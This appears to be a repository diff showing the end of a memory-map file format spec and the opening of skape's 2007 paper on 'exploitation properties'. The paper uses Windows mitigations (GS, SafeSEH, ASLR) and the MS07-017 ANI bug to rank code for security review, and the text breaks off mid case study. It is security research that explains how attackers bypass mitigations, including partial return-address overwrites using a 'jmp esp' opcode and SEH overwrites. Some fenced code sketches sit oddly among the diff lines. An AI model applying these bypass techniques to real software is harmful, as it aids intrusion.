The Data Type values are currently defined in the following table:
|
||||
|
||||
+-------+-------------------+
| Value | Type              |
+-------+-------------------+
| 0     | Reserved          |
| 1     | Static Data       |
| 2     | Temporal Data     |
| 3     | Environment Data  |
+-------+-------------------+
|
||||
|
||||
A.3) File Parsing
|
||||
|
||||
Parsing of a memory map file is as simple as beginning with the first byte in
|
||||
the file, reading the first three elements of the data record as they are of
|
||||
fixed size, then using the last of those three elements as size indicator to
|
||||
read the final element. If any data remains in the file, there is at least
|
||||
one more data record to be read.
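
The parsing procedure above can be sketched as follows. This is an illustrative reader, not the code shipped with the supporting tools; it assumes the Size element counts bytes of Data, and the name `parse_memory_map` is hypothetical.

```python
import struct

# Data Type (8 bits), Base Address and Size (32 bits each, big-endian)
RECORD_HEADER = struct.Struct(">BII")


def parse_memory_map(blob: bytes):
    """Yield (data_type, base_address, data) for each record in blob."""
    offset = 0
    while offset < len(blob):
        data_type, base, size = RECORD_HEADER.unpack_from(blob, offset)
        offset += RECORD_HEADER.size
        data = blob[offset:offset + size]
        if len(data) != size:
            raise ValueError("truncated data record")
        offset += size
        yield data_type, base, data
```

Because records are simply concatenated, the same function reads a single map or several maps joined together with `cat`.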
|
||||
|
||||
To provide for easy parsing and review of memory map files, an 010 Editor
|
||||
template is provided by this research effort.
|
875
uninformed/9.4.txt
Normal file
|
@ -0,0 +1,875 @@
|
|||
Improving Software Security Analysis using Exploitation Properties
|
||||
12/2007
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
Abstract
|
||||
|
||||
Reliable exploitation of software vulnerabilities has continued to become more
|
||||
difficult as formidable mitigations have been established and are now included
|
||||
by default with most modern operating systems. Future exploitation of
|
||||
software vulnerabilities will rely on either discovering ways to circumvent
|
||||
these mitigations or uncovering flaws that are not adequately protected.
|
||||
Since the majority of the mitigations that exist today lack universal bypass
|
||||
techniques, it has become more fruitful to take the latter approach. It is in
|
||||
this vein that this paper introduces the concept of exploitation properties
|
||||
and describes how they can be used to better understand the exploitability of
|
||||
a system irrespective of a particular vulnerability. Perceived exploitability
|
||||
is of utmost importance to both an attacker and to a defender given the
|
||||
presence of modern mitigations. The ANI vulnerability (MS07-017) is used to
|
||||
help illustrate these points by acting as a simple example of a vulnerability
|
||||
that may have been more easily identified as code that should have received
|
||||
additional scrutiny by taking exploitation properties into consideration.
|
||||
|
||||
1) Introduction
|
||||
|
||||
Modern exploit mitigations have become formidable opponents with respect to
|
||||
the effect they have on reliable exploitation. Some of the more substantial
|
||||
modern mitigations include GuardStack (GS), SafeSEH, DEP (NX), ASLR, pointer
|
||||
encoding, and various heap improvements[8, 9, 10, 15, 24, 3, 4]. The fact
|
||||
that there have been very few public exploits that have been able to
|
||||
universally bypass all of these mitigations at once is a testament to the
|
||||
resilience of these techniques working in concert with one another. It is
|
||||
obvious that the absence of a given mitigation directly contributes to the
|
||||
exploitability of the associated code. Likewise, it is also well known that
|
||||
most mitigations have situations in which they will offer little to no
|
||||
protection[5, 16, 18, 20, 2, 4]. For instance, in certain cases, it may be
|
||||
possible to perform a partial overwrite on Windows Vista to defeat ASLR due to
|
||||
the fact that only 15 bits of most 32-bit addresses may be affected by
|
||||
randomization[2, 17]. Other mitigations also have situations where they may
|
||||
not provide adequate coverage.
|
||||
|
||||
Given the fact that the majority of mitigations have known limitations, it
|
||||
makes sense to consider where this information might be useful. In the field
|
||||
of program analysis, whether it be manual, static, or dynamic, the question of
|
||||
scoping is often pertinent. This question typically revolves around figuring
|
||||
out what areas of code should be reviewed and what precedence, if any, should
|
||||
be assigned to different regions. Typical approaches taken to accomplish this
|
||||
often involve identifying code that straddles a trust boundary or performs
|
||||
complex operations reachable from a trust boundary. However, depending on
|
||||
one's perspective, this type of approach is insufficient in the face of modern
|
||||
mitigations because it may result in areas of code being reviewed that are
|
||||
adequately protected by all mitigations.
|
||||
|
||||
To help address this perceived deficiency, this paper introduces the concept
|
||||
of exploitation properties and describes how they can be used to provide a
|
||||
better understanding of exploitability of a system if a vulnerability is found
|
||||
to be present. Regions of code that are found to have a number of distinct
|
||||
exploitation properties may be more interesting from an exploitation
|
||||
standpoint and therefore may warrant additional scrutiny from a program
|
||||
analysis perspective. The use of exploitation properties may benefit both an
|
||||
attacker and a defender. For example, companies may wish to perform targeted
|
||||
reviews on areas of code that may be more trivially exploited in an effort to
|
||||
prevent reliable exploits from being released in the future. Likewise, an
|
||||
attacker searching for a vulnerability may wish to avoid auditing regions of
|
||||
code that are likely to be more difficult to exploit.
|
||||
|
||||
Exploitation properties represent additional criteria that can be used when
|
||||
attempting to better understand the security aspects of a program. Annotating
|
||||
regions of code with exploitation properties makes it possible to use set
|
||||
unions and intersections to identify the subset of interesting regions of code
|
||||
for a particular analysis problem. For example, an attacker may wish to
|
||||
determine the regions of code that may permit the use of traditional
|
||||
stack-based buffer overflow techniques as well as permitting a partial
|
||||
overwrite of a return address in order to defeat ASLR. Using these two
|
||||
exploitation properties as criteria, a narrowed subset can be produced
|
||||
which contains only those regions which meet both criteria by intersecting
|
||||
those regions that have both exploitation properties. For the purpose of
|
||||
this paper, the term narrowing is not used in the strict mathematical
|
||||
sense; rather, this paper uses narrowing to describe the process of
|
||||
constraining the scope of analysis through the use of specific criteria.
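
As a rough illustration of this narrowing step, the annotations can be modeled as sets of function names keyed by property. The property names and function names below are hypothetical placeholders, not output from any real analysis.

```python
# Hypothetical annotations: exploitation property -> functions that carry it.
properties = {
    "stack_overflow_feasible": {"load_icon", "parse_header", "copy_name"},
    "partial_overwrite_feasible": {"load_icon", "copy_name", "read_chunk"},
}


def narrow(properties, *required):
    """Return the regions of code that carry every required property."""
    return set.intersection(*(properties[name] for name in required))
```

Here `narrow(properties, "stack_overflow_feasible", "partial_overwrite_feasible")` leaves only `load_icon` and `copy_name` as candidates for closer review.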
|
||||
|
||||
The concept of using automated analysis as a precursor to more strenuous
|
||||
program analysis is certainly not new. There have been many tools ranging
|
||||
from the simple detection of calls to strcpy to much more sophisticated forms
|
||||
of static analysis. Still, the use of exploitation properties can be seen as
|
||||
an additional set of data points which may be useful in the context of program
|
||||
analysis given the hypothesis that most reliably exploitable security
|
||||
vulnerabilities are being pushed into areas of code that are less affected by
|
||||
mitigations.
|
||||
|
||||
The concept of exploitation properties is presented as follows. Section 2
|
||||
categorizes and defines a limited number of concrete exploitation properties.
|
||||
Section 3 provides a concrete example of using exploitation properties to help
|
||||
identify the function that contained the ANI vulnerability. Section 4
|
||||
describes some potential ways in which exploitation properties can be applied.
|
||||
Section 5 gives a brief description of future work involving exploitation
|
||||
properties.
|
||||
|
||||
2) Exploitation Properties
|
||||
|
||||
Exploitation properties describe the ease with which an arbitrary
|
||||
vulnerability might be exploited. An understanding of a system's perceived
|
||||
exploitability can provide useful insights when attempting to establish the
|
||||
risk factors associated with it. An example of this can be seen in threat
|
||||
modeling where the DREAD model of classifying risk includes a high-level
|
||||
evaluation of exploitability as one of the risk factors[14]. It is important
|
||||
to note that exploitation properties do not provide any indication that a
|
||||
vulnerability exists; instead, they are only meant to convey information about
|
||||
how easily a vulnerability could be exploited. The concept of an exploitation
|
||||
property can be broken into different categories which are tied to the
|
||||
configuration or context that the property is associated with. Examples of
|
||||
these categories include platforms, processes, binary modules, functions, and
|
||||
so on.
|
||||
|
||||
The following subsections provide concrete examples to better illustrate the
|
||||
concept of an exploitation property. These examples are given by showing what
|
||||
implications a property has with respect to exploitation as well as how a
|
||||
property might be derived. It should be noted that the examples given in this
|
||||
paper do not represent a complete, exhaustive set of exploitation properties.
|
||||
|
||||
2.1) Platform Properties
|
||||
|
||||
Exploitation properties associated with a platform are meant to illustrate how
|
||||
easily a vulnerability may be exploited when a given platform configuration,
|
||||
such as the operating system or architecture, is used. For example, Windows
|
||||
2000 does not include support for enforcing non-executable pages. This
|
||||
implies that any vulnerability found within an application that runs in the
|
||||
context of the Windows 2000 platform may be exploited more easily. An
|
||||
understanding of exploitation properties that are associated with a platform
|
||||
may be useful when attempting to assess the risk of applications that might
|
||||
run on multiple platforms. There are many other examples of exploitation
|
||||
properties that are tied to platforms. In order to limit the scope of this
|
||||
document, platform exploitation properties are not discussed at length.
|
||||
|
||||
2.2) Process Properties
|
||||
|
||||
Process exploitation properties carry some information about how easily
|
||||
vulnerabilities found within the context of a running process may be
|
||||
exploited. For example, Internet Explorer running on 32-bit versions of
|
||||
Windows Vista does not make use of hardware-enforced DEP (NX) by default. This
|
||||
means that any vulnerabilities found within code that runs in the context of
|
||||
Internet Explorer will not be protected by non-executable regions. An
|
||||
understanding of exploitation properties that are associated with a process
|
||||
context can help to provide a better understanding of the risks associated
|
||||
with code that may run in the context of a given process. In order to limit
|
||||
the scope of this document, process exploitation properties are not discussed
|
||||
at length.
|
||||
|
||||
2.3) Module Properties
|
||||
|
||||
Module exploitation properties are used to illustrate the effect that a
|
||||
particular binary module has on ease of exploitation. This category of
|
||||
properties is useful when attempting to identify binaries that may be more
|
||||
easily exploited if a vulnerability is found within them or in code that
|
||||
depends on them. This subsection describes two examples of module
|
||||
exploitation properties.
|
||||
|
||||
2.3.1) No Support for ASLR
|
||||
|
||||
Windows Vista was the first major release of Windows to include a built-in
|
||||
implementation of Address Space Layout Randomization (ASLR)[15,24]. In order
|
||||
to head off potential application compatibility issues, Microsoft chose to
|
||||
make ASLR an opt-in feature by requiring binaries to be compiled with a new
|
||||
compiler switch (/dynamicbase)[21]. This compiler switch is responsible for
|
||||
setting a bit (0x40) in the DllCharacteristics that are defined within a
|
||||
binary. If this bit is set, the Windows kernel will attempt to randomize the
|
||||
base address of the binary when it is mapped into memory the first time. If
|
||||
the bit is not set, the binary will not have its base address randomized,
|
||||
although it could be relocated in memory if the binary's preferred region is
|
||||
already occupied by another allocation. As such, any binary that does not
|
||||
support ASLR may be mapped at a predictable location within a process address
|
||||
space at execution time. This can allow an attacker to make assumptions about
|
||||
the address space which may make exploitation easier if a vulnerability is
|
||||
found within any code that is mapped into the same address space as the module
|
||||
of interest.
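
Deriving this property for a given binary amounts to reading one field from its PE headers. The sketch below is a minimal illustration that assumes a well-formed PE32 or PE32+ image held in memory as `bytes`; the function name `supports_aslr` is hypothetical, and the DllCharacteristics field is taken to sit 70 bytes into the optional header, as laid out in the PE format.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # the bit set by /dynamicbase


def supports_aslr(image: bytes) -> bool:
    """Return True if the PE image has opted in to ASLR."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image")
    # e_lfanew at offset 0x3C holds the file offset of the PE signature.
    (pe_offset,) = struct.unpack_from("<I", image, 0x3C)
    if image[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    optional_header = pe_offset + 4 + 20  # signature + COFF file header
    (dll_chars,) = struct.unpack_from("<H", image, optional_header + 70)
    return bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
```

Running this over every module that a process loads, for example with `supports_aslr(open(path, "rb").read())`, would flag the binaries that remain at predictable addresses.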
|
||||
|
||||
2.3.2) No Support for SafeSEH
|
||||
|
||||
With Visual Studio 2003, Microsoft introduced a compile-time change known as
|
||||
SafeSEH which attempts to act as a mitigation for the SEH overwrite attack
|
||||
vector[5,9]. SafeSEH works by adding a static list of known good exception
|
||||
handlers that are considered valid as metadata within a given binary.
|
||||
Binaries that support SafeSEH allow the exception dispatcher to perform
|
||||
additional checks when dispatching exceptions. The most important check
|
||||
involves determining if an exception handler that is found to exist within the
|
||||
mapped region of a given binary is actually considered to be one of the safe
|
||||
exception handlers. If the exception handler is not a safe exception handler,
|
||||
the exception dispatcher can take steps to prevent it from being called. This
|
||||
behavior works to mitigate the potential exploitation vector.
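A heavily simplified model of this check is sketched below. It assumes the
safe handler table stores relative virtual addresses (RVAs) and that a module
without a table is simply trusted; the structure and function names are
invented for this example, and the real exception dispatcher performs
additional checks that are not modeled here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified view of one loaded module (all names are illustrative). */
struct module_info {
    uint32_t base;              /* address the image is mapped at     */
    uint32_t size;              /* size of the mapping in bytes       */
    const uint32_t *safe_rvas;  /* safe handler table (RVAs), or NULL */
    size_t safe_count;          /* number of entries in the table     */
};

/*
 * Returns  1 if the dispatcher would be willing to call `handler`,
 *          0 if the handler lies in a SafeSEH module but is not listed,
 *         -1 if the handler is not inside this module at all.
 */
int handler_is_allowed(const struct module_info *mod, uint32_t handler)
{
    assert(mod != NULL);
    if (handler < mod->base || handler - mod->base >= mod->size)
        return -1;
    if (mod->safe_rvas == NULL)
        return 1;   /* module was not built with SafeSEH: anything goes */
    uint32_t rva = handler - mod->base;
    for (size_t i = 0; i < mod->safe_count; i++)
        if (mod->safe_rvas[i] == rva)
            return 1;
    return 0;
}
```

The second branch is the interesting one from an exploitation standpoint: a
single module without a table leaves every address inside it usable as a
handler.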
|
||||
|
||||
In order to communicate this information to the exception dispatcher, modern
|
||||
PE files include fields in the load config data directory which hold the
|
||||
offset of the safe exception handler table and the number of elements found
|
||||
within the table. The load config data directory contains metadata that is
|
||||
useful to the dynamic loader such as information about safe exception
|
||||
handlers, the module's global security cookie address, and so on[13]. The
|
||||
following output from dumpbin.exe illustrates what this might look like:
|
||||
|
||||
310751E0 Safe Exception Handler Table
|
||||
1 Safe Exception Handler Count
|
||||
|
||||
Safe Exception Handler Table
|
||||
|
||||
Address
|
||||
--------
|
||||
310357D1 __except_handler4
|
||||
|
||||
Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
|
||||
unless every binary that is loaded into an address space has been compiled to
|
||||
make use of SafeSEH. If a binary has not been compiled to make use of
|
||||
SafeSEH, an attacker may be able to use any address found within the binary's
|
||||
memory mapping as an exception handler in conjunction with an SEH overwrite.
|
||||
|
||||
2.4) Function Properties
|
||||
|
||||
Function exploitation properties convey information about how a function
|
||||
contributes to the exploitability of an application. For example, a function
|
||||
might make it possible to use certain exploitation techniques that might
|
||||
otherwise be prevented if mitigations were present. Alternatively, a function
|
||||
might simply assist in the exploitation process. Function exploitation
|
||||
properties are especially useful because they provide more detailed
|
||||
information than exploitation properties that are derived from the platform,
|
||||
process, or module context.
|
||||
|
||||
2.4.1) Absence of GuardStack
|
||||
|
||||
The GuardStack (GS) support included with versions of the Microsoft Visual
|
||||
Studio compiler since 2002 offers a compile-time mitigation to traditional
|
||||
stack-based buffer overflows[23]. It supports this through a combination of a
|
||||
random canary inserted into a stack frame at runtime and an intelligent stack
|
||||
frame layout algorithm. The random canary is pushed onto the stack when a
|
||||
function is called and then popped off the stack and validated prior to
|
||||
function return. If the canary does not match the expected value, it is
|
||||
assumed that a stack-based buffer overflow occurred and that the process
|
||||
should be terminated.
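The canary idea can be illustrated with a toy model. The sketch below does
not reproduce the code that the compiler emits; it uses an ordinary struct to
stand in for a stack frame, and the names toy_frame and toy_call are
hypothetical. The copy is deliberately bounded by the size of the struct so
that the simulation itself stays well defined.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy model of a protected frame: the canary sits above the local buffer. */
struct toy_frame {
    char     buf[8];   /* fixed-size local array                    */
    uint32_t canary;   /* copy of the cookie placed by the prologue */
    uint32_t ret;      /* stand-in for the saved return address     */
};

/*
 * Copy `n` bytes into the frame starting at buf, the way an unchecked copy
 * would, then perform the epilogue check. Returns 1 if the canary is intact
 * and 0 if corruption was detected (a real process would terminate here).
 */
int toy_call(const uint8_t *input, size_t n, uint32_t cookie)
{
    struct toy_frame frame;
    assert(input != NULL);
    memset(&frame, 0, sizeof frame);
    frame.canary = cookie;        /* prologue: place the canary        */
    if (n > sizeof frame)         /* keep the simulation in bounds     */
        n = sizeof frame;
    memcpy(&frame, input, n);     /* anything past 8 bytes leaves buf  */
    return frame.canary == cookie; /* epilogue: validate before return */
}
```

An input of eight bytes or fewer leaves the canary untouched, while any input
long enough to reach the stand-in return address must first pass through the
canary.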
|
||||
|
||||
Since the initial release of GS support, a number of techniques have been
|
||||
described that could be used to bypass or weaken it[5, 16, 20]. While these
|
||||
techniques were at one time useful or have not yet been fully realized, the
|
||||
author assumes that most would agree that the GS implementation provided by
|
||||
the most recent compiler is robust (with the exception of SEH). There is
|
||||
currently no publicly known universal bypass technique for GS that the author
|
||||
is aware of. Given this assumption, functions that are protected by GS become
|
||||
less interesting from the standpoint of identifying stack-based buffer
|
||||
overflows. On the other hand, functions that are not protected by GS can
|
||||
instantly be qualified as interesting targets for review. This is especially
|
||||
true with binaries that have been compiled with GS support but contain a
|
||||
number of functions that the compiler has chosen not to compile with GS
|
||||
protections. This choice is made by taking into account certain conditions such
|
||||
as the presence or absence of local variables that are declared as fixed-size
|
||||
arrays.
|
||||
|
||||
As previous research has illustrated[27], it is possible to identify functions
|
||||
that have not been compiled to use GS through the use of simple static
|
||||
analysis tools. It is also possible to further refine the approaches
|
||||
described in previous research if one has symbols and one assumes that the
|
||||
most recent compiler was used. This can be accomplished by analyzing the call
|
||||
graph of an executable and noting the set of functions that do not call
|
||||
__security_check_cookie. Considered another way, the same set of functions can be
|
||||
identified by taking the set of all functions contained within a binary less
|
||||
the subset that call __security_check_cookie. The set of functions that is
|
||||
identified by either approach can be annotated with an exploitation property
|
||||
that indicates that they may contain stack-based buffer overflows that would
|
||||
not be hindered by GS.
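The set difference described above can be sketched over a call graph that is
represented as a flat list of edges. The representation and the function
names below are assumptions made for this example; a real tool would obtain
the edges from a disassembler or compiler framework.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* One edge of a call graph: `caller` contains a call to `callee`. */
struct call_edge {
    const char *caller;
    const char *callee;
};

/* Returns 1 if `func` has an outgoing edge to __security_check_cookie. */
static int calls_cookie_check(const struct call_edge *edges, size_t n_edges,
                              const char *func)
{
    for (size_t i = 0; i < n_edges; i++)
        if (strcmp(edges[i].caller, func) == 0 &&
            strcmp(edges[i].callee, "__security_check_cookie") == 0)
            return 1;
    return 0;
}

/*
 * Writes into `out` every function from `funcs` that never calls the cookie
 * check and returns how many were written. `out` needs room for n_funcs.
 */
size_t functions_without_gs(const char *const *funcs, size_t n_funcs,
                            const struct call_edge *edges, size_t n_edges,
                            const char **out)
{
    size_t count = 0;
    assert(funcs != NULL && out != NULL);
    for (size_t i = 0; i < n_funcs; i++)
        if (!calls_cookie_check(edges, n_edges, funcs[i]))
            out[count++] = funcs[i];
    return count;
}
```

Each function returned by functions_without_gs would receive the "Absence of
GuardStack" annotation.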
|
||||
|
||||
It may also be prudent to take the compiler version that was used into
|
||||
consideration when analyzing binaries. This is important due to the fact that
|
||||
older versions of the compiler used a GS implementation that could be
|
||||
trivially defeated in certain circumstances[16]. For example, previous versions
|
||||
of GS did not lay out the stack frame in a manner that would prevent an
|
||||
attacker from overwriting other local variables and function arguments. In
|
||||
scenarios where this occurred and an overwritten local variable or parameter
|
||||
was dereferenced (such as by invoking a function pointer), the mitigation
|
||||
offered by GS would be meaningless. Thus, a secondary exploitation property
|
||||
could involve identifying functions where attacks such as the one described
|
||||
above could be possible.
|
||||
|
||||
2.4.2) Partial Overwrite Feasibility
|
||||
|
||||
One of the unique consequences of implementing Address Space Layout
|
||||
Randomization (ASLR) on Windows is the limitation that the system allocation
|
||||
granularity imposes on the number of bits that can be randomized within most
|
||||
memory allocations. In particular, the allocation granularity used by Windows
|
||||
enforces strict 16-page alignment for the base addresses of most memory
|
||||
mappings in user-mode. This restriction means that it is only possible to
|
||||
introduce entropy into the low 15 bits of the high-order 16 bits of a 32-bit
|
||||
memory mapping[17]. While this may sound odd at first glance, the high-order
bit is not randomized due to the divide between kernel and user-mode. This
|
||||
assumes that a machine is booted without /3GB. The low-order 16 bits remain
|
||||
unchanged relative to the high-order bits. This caveat means that it may be
|
||||
possible to perform a partial overwrite of an address and thus bypass the
|
||||
security features offered by ASLR[2]. However, the ability to perform a partial
|
||||
overwrite also relies on the presence of useful code or data within a region
|
||||
that is relative to the address that is being overwritten.
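The arithmetic behind a partial overwrite is small enough to show directly.
The sketch below assumes a 32-bit little-endian target and 4 KB pages, so
that 16 pages amount to 64 KB (0x10000 bytes); the function names are
illustrative only.

```c
#include <assert.h>
#include <stdint.h>

/* Windows allocation granularity: 16 pages of 4 KB each, i.e. 64 KB. */
#define ALLOC_GRANULARITY 0x10000u

/* 1 if both addresses fall in the same 64 KB aligned region. */
int same_region(uint32_t a, uint32_t b)
{
    return (a / ALLOC_GRANULARITY) == (b / ALLOC_GRANULARITY);
}

/*
 * Model of a two-byte partial overwrite: the low 16 bits of the stored
 * address are replaced, while the randomized high 16 bits stay exactly as
 * the loader chose them.
 */
uint32_t partial_overwrite(uint32_t original, uint16_t low16)
{
    uint32_t result = (original & 0xFFFF0000u) | low16;
    assert(same_region(original, result));
    return result;
}
```

Whatever base the loader picks, the attacker-controlled low 16 bits select a
target inside the same 64 KB region as the original address, which is why the
randomized bits never need to be known.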
|
||||
|
||||
To visualize how this type of information might be useful, consider a scenario
|
||||
where an attacker is performing a partial overwrite of a return address on the
|
||||
stack. In this situation, it is often necessary for one or more useful
opcodes to be present within the same 16-page aligned region as the return
address. For example, consider a scenario where the function f may have a
vulnerability that would permit a partial overwrite. In this example, f is
called by h and y. In order to permit the use of a partial overwrite, a
useful opcode must be found within the same 16-page aligned region that
either h or y reside on. If a useful opcode is present, an exploitation
property can be attached to f in order to indicate that a partial overwrite
may be feasible due to the presence of a useful opcode within the same
16-page aligned region as either h or y. For example, consider the following
pseudo-disassembly illustrating a case where the call f instruction in h is
on the same 16-page region as a useful opcode:
|
||||
|
||||
... useful jmp on same 16-page region 0x14c1XXXX
|
||||
0x14c1fc04 jmp esp
|
||||
... entry point to h()
|
||||
0x14c1a910 push ebp
|
||||
0x14c1a911 mov ebp, esp
|
||||
0x14c1a914 call f
|
||||
... entry point to y(), not on same 16-page region
|
||||
0x137f44c8 push ebp
|
||||
|
||||
While this captures the basic concept, a better approach might be to view a
|
||||
binary in a different way. For example, consider the following approach to
|
||||
drawing the same conclusion: for each code region that contains a useful
|
||||
opcode, identify the subset of functions that are called from call sites
|
||||
within the same 16-page aligned region as the useful opcode. This has the
|
||||
effect of annotating all of the child functions that could potentially
|
||||
leverage a partial overwrite of the return address with respect to a
|
||||
particular collection of opcodes.
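The region-first approach might be sketched as follows. The inputs (a list of
useful opcode addresses and a list of call sites with callee indices) are
assumed to have been produced by an earlier pass, and every name in the
sketch is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* A call instruction at `site` that transfers control to function `callee`. */
struct call_site {
    uint32_t site;
    int      callee;   /* index into the caller-supplied function table */
};

/*
 * For every call site that shares a 64 KB aligned region with at least one
 * useful opcode, set annotated[callee] = 1. Returns the number of functions
 * annotated. `annotated` must hold n_funcs entries.
 */
size_t annotate_partial_overwrite(const uint32_t *opcodes, size_t n_opcodes,
                                  const struct call_site *calls, size_t n_calls,
                                  unsigned char *annotated, size_t n_funcs)
{
    size_t count = 0;
    assert(annotated != NULL);
    for (size_t f = 0; f < n_funcs; f++)
        annotated[f] = 0;
    for (size_t c = 0; c < n_calls; c++) {
        if (calls[c].callee < 0 || (size_t)calls[c].callee >= n_funcs)
            continue;                       /* ignore malformed edges */
        for (size_t o = 0; o < n_opcodes; o++) {
            if ((calls[c].site >> 16) != (opcodes[o] >> 16))
                continue;                   /* different 64 KB region */
            if (!annotated[calls[c].callee]) {
                annotated[calls[c].callee] = 1;
                count++;
            }
            break;
        }
    }
    return count;
}
```

The result depends entirely on which addresses are supplied as useful
opcodes, which is the caveat discussed next.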
|
||||
|
||||
One important point that must be made about this exploitation property is that
it is entirely dependent upon the definition of "useful code or data".
|
||||
Exploitation is very much an art and it goes without saying that attempting to
|
||||
constrain the approaches that an attacker might make use of is likely to be
|
||||
folly. However, defining a known set of useful opcodes and using that set as
|
||||
a base with which to draw the above conclusion can be said to be better than
|
||||
not doing so at all.
|
||||
|
||||
2.4.3) Function or Parent Registers an Exception Handler
|
||||
|
||||
One of the unique exploitation vectors that exists in 32-bit programs that run
|
||||
on Windows is known as an SEH overwrite[5]. An SEH overwrite makes it possible
|
||||
to gain control of execution flow by overwriting an exception registration
|
||||
record on the stack. From an exploitation perspective, the act of registering
|
||||
an exception handler within a function opens up the possibility of making use
|
||||
of an SEH overwrite. Since exception handlers are chained, the act of
|
||||
registering an exception handler also implicates any functions that are
|
||||
children of a function that registers the exception handler. This makes it
|
||||
possible to define an exploitation property that illustrates the possibility
|
||||
of an SEH overwrite being abused within the scope of a specific set of
|
||||
functions. Detecting this property can be as simple as signaturing the
|
||||
compiler generated code that is used to generate and register an exception
|
||||
handler within a function. An example of two functions, f and g, that would
meet these criteria can be seen below:
|
||||
|
||||
void f() {
|
||||
__try {
|
||||
g();
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER) {
|
||||
}
|
||||
}
|
||||
|
||||
void g() {
|
||||
...
|
||||
}
|
||||
|
||||
In addition to this information being useful from an SEH overwrite
|
||||
perspective, it may also benefit an attacker in situations where an exception
|
||||
handler simply swallows any exceptions that are dispatched without crashing
|
||||
the process[1]. In the example given above, any exception that occurs in the
context of g will be swallowed by f without necessarily crashing the process.
|
||||
This behavior may allow an attacker to retry their exploitation attempt
|
||||
multiple times, thus enabling a bruteforce attack that would otherwise not be
|
||||
feasible. This can make defeating ASLR more feasible.
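Because the property extends to the children of a registering function, it
can be propagated over a call graph. The sketch below assumes a small graph
stored as an adjacency matrix and a per-function flag that records whether
the function registers a handler; both the representation and the names are
inventions of this example rather than part of any existing tool.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_FUNCS 64

/* Adjacency matrix: calls[a][b] != 0 means function a calls function b. */
struct call_graph {
    size_t n;
    unsigned char calls[MAX_FUNCS][MAX_FUNCS];
};

/* Depth-first walk that marks `f` and everything reachable from it. */
static void mark_reachable(const struct call_graph *g, size_t f,
                           unsigned char *covered)
{
    if (covered[f])
        return;
    covered[f] = 1;
    for (size_t child = 0; child < g->n; child++)
        if (g->calls[f][child])
            mark_reachable(g, child, covered);
}

/*
 * covered[i] is set to 1 when function i registers a handler itself or can
 * run beneath a function that does. Both arrays hold g->n entries.
 */
void propagate_seh_property(const struct call_graph *g,
                            const unsigned char *registers,
                            unsigned char *covered)
{
    assert(g != NULL && g->n <= MAX_FUNCS);
    for (size_t i = 0; i < g->n; i++)
        covered[i] = 0;
    for (size_t i = 0; i < g->n; i++)
        if (registers[i])
            mark_reachable(g, i, covered);
}
```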
|
||||
|
||||
2.4.4) Function is an Exception Handler
|
||||
|
||||
The introduction of SafeSEH as a modern compile-time mitigation has caused the
|
||||
particulars of how exception handlers are implemented to become more
|
||||
interesting. This has to do with the fact that SafeSEH restricts the set of
|
||||
exception handlers that may be called by the exception dispatcher to those
|
||||
that are specified as being valid within the scope of a given binary. As
|
||||
discussed previously in this paper, SafeSEH prevents traditional SEH
|
||||
overwrites from being able to use any address as the overwritten exception
|
||||
handler. While this is effective in its primary intent, there is still the
|
||||
possibility that a valid exception handler can be abused to make exploitation
|
||||
more feasible[1]. This scenario is restricted to EH3 and prior exception
|
||||
handlers as EH4 includes a check of a cookie before dispatching exceptions.
|
||||
As such, it may be useful to flag the regions of code that are associated with
|
||||
EH3 and prior exception handlers, including language-specific exception
|
||||
handlers, as being potentially interesting from an exploitation perspective.
|
||||
|
||||
Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
|
||||
unless every binary that is loaded into a process address space has been
|
||||
compiled to make use of SafeSEH. If a binary has not been compiled to make
|
||||
use of SafeSEH, an attacker may be able to use any address found within the
|
||||
binary's memory mapping as an exception handler in the context of an SEH
|
||||
overwrite. This may make exploitation more feasible.
|
||||
|
||||
3) Case Study: MS07-017
|
||||
|
||||
The animated cursor (ANI) vulnerability was discovered by Alexander Sotirov in
|
||||
late 2006 and patched by Microsoft with the MS07-017 critical update in April
2007. Apart from being a client-side vulnerability that was exposed through
|
||||
web-browsers and other mediums, the ANI vulnerability was one of the first
|
||||
notable security issues that affected Windows Vista. It was notable due to
|
||||
the simple fact that even though Microsoft had touted Windows Vista as being
|
||||
the most secure operating system to date, the exploits that were released for
|
||||
the ANI vulnerability were very reliable. These exploits were able to ignore
|
||||
or defeat the protections offered by mitigations such as GS, DEP, and even
|
||||
Vista's newest mitigation: ASLR.
|
||||
|
||||
To better understand how this was possible it is important to dive deeper into
|
||||
the details of the vulnerability itself. Section 3.1 gives a brief
description of the ANI vulnerability and some of the techniques that were
used to successfully exploit it. Section 3.2 then illustrates how exploitation
|
||||
properties, in combination with another class of properties, can be used to
|
||||
detect functions that may contain vulnerabilities similar to the ANI
|
||||
vulnerability. This is meant to help illustrate the perceived benefits of
|
||||
applying the concept of exploitation properties to aid in the process of
|
||||
identifying regions of code that may deserve additional scrutiny based on
|
||||
their perceived exploitability.
|
||||
|
||||
3.1) Background
|
||||
|
||||
While the ANI vulnerability was certainly unique, it was not the first time
|
||||
the animated cursor code was found to have a security issue. Microsoft patched
|
||||
an issue that was almost exactly the same as MS07-017 with MS05-002 roughly
|
||||
two years prior. In both cases, the underlying security issue was related to
|
||||
a failure to properly validate input that was derived from the contents of an
|
||||
animated cursor file. Alexander Sotirov provided much of the initial research
|
||||
on the ANI vulnerability and also gave an excellent write-up to its effect[22].
|
||||
This paper will only attempt to highlight the flaw.
|
||||
|
||||
The vulnerability itself was found in user32!LoadAniIcon which is responsible
|
||||
for processing a number of different chunks that may be contained within an
|
||||
animated cursor file. Each chunk is a TLV (Type-Length-Value) as described
|
||||
by the following structure:
|
||||
|
||||
struct ANIChunk
|
||||
{
|
||||
char tag[4]; // ASCII tag
|
||||
DWORD size; // length of data in bytes
|
||||
char data[size]; // variable sized data
|
||||
}
|
||||
|
||||
Keeping this structure in mind, the flaw itself can be seen in the abbreviated
|
||||
pseudo-code below as modified slightly from Sotirov's original write-up:
|
||||
|
